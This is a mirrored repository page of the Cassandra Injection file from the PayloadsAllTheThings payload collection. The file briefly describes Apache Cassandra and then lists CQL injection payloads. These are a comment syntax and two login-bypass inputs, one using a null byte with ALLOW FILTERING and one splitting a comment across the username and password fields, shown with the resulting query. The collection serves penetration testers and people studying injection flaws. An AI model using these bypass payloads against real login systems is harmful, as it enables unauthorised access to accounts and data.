daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PayloadsAllTheThings/SQL Injection/Cassandra Injection.md

44 lines
763 B
Markdown
Raw Blame History

# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Summary
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Login Bypass 0](#login-bypass-0)
* [Login Bypass 1](#login-bypass-1)
* [References](#references)
## Cassandra comment
```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass
### Login Bypass 0
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Login Bypass 1
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
## References
Reference in New Issue View Git Blame Copy Permalink